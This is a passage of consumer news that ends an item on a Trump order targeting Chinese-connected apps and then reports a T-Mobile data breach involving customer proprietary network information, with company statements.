“At this time, action must be taken to address the threat posed by these Chinese connected software applications,” Trump wrote. 

The order will take effect after 45 days, which leaves open the possibility that President-elect Joe Biden will revoke it. The incoming presidential administration has yet to say how it plans to handle the order. 

The Trump administration has previously attempted to ban Chinese-based apps like TikTok and WeChat over national security concerns. Both attempts were unsuccessful. 

In 2019, the administration launched a trade war against Beijing and blacklisted Huawei Technologies, ZTE, and Chinese firms over national security concerns. The Federal Communications Commission (FCC) has designated Huawei and ZTE as national security threats, but both companies have denied that they share data with the Chinese government.

T-Mobile’s cybersecurity team is once again being put to the test. On Monday, the phone carrier announced that it experienced its fourth data breach in three years. 

The company did not say what portion of its nearly 100 million user accounts were at risk, but it did confirm that the data accessed did not include names on the account, physical or email addresses, financial data, credit card information, social security numbers, tax IDs, passwords, or PINs.

“Our Cybersecurity team recently discovered and shut down malicious, unauthorized access to some information related to your T-Mobile account,” said Matt Staneff, the Chief Marketing Officer of T-Mobile USA.

“We immediately started an investigation, with assistance from leading cybersecurity forensics experts, to determine what happened and what information was involved. We also immediately reported this matter to federal law enforcement and are now in the process of notifying impacted customers.”

What happened?

In a letter to customers, Staneff said T-Mobile’s cybersecurity team detected -- then shut down -- “malicious, unauthorized access” to “some” information related to T-Mobile accounts. Staneff qualified “some” as customer proprietary network information (CPNI). Collecting CPNI data is a permission given to phone companies by the Federal Communications Commission (FCC) and typically includes call information like the date, duration of the call, the phone number called, and the type of network a consumer subscribes to -- in short, the type of information that appears on a customer's phone bill.

“We immediately started an investigation, with assistance from leading cybersecurity forensics experts, to determine what happened and what information was involved. We also immediately reported this matter to federal law enforcement and are now in the process of notifying impacted customers,” Staneff said.

T-Mobile users weren’t so lucky in March 2020 when a data breach allowed hackers to gain access to T-Mobile employee email accounts. That, in turn, opened up access to customers’ names, addresses, Social Security numbers, financial account information, phone numbers, billing and account information, and rate plans. 

T-Mobile offers to answer any questions

Staneff said the company is ready to answer additional questions if a customer wants further details. Customers can either contact the company online, ask questions at one of the company’s stores, or go through the customer service team at 1-800-937-8997. 

“We are sorry for any inconvenience this may cause you. We take the security of customer information seriously and, while we have a number of safeguards in place to protect customer information from unauthorized access, we will continue to work to further enhance security so we can mitigate this type of activity,” Staneff promised.